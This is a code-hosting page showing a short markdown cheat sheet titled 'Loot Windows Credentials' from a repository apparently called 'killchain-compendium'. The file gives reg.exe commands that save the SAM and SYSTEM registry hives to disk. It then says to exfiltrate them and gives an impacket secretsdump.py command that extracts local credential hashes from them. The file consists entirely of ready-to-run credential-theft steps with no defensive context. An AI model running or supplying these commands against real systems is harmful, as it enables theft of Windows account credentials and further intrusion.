whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exfiltration/Windows/loot.md

219 B
Raw Blame History

Loot Windows Credentials

reg.exe save HKLM\SAM sam.bak

reg.exe save HKLM\SYSTEM system.bak
  • Exifiltrate and use impacket
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL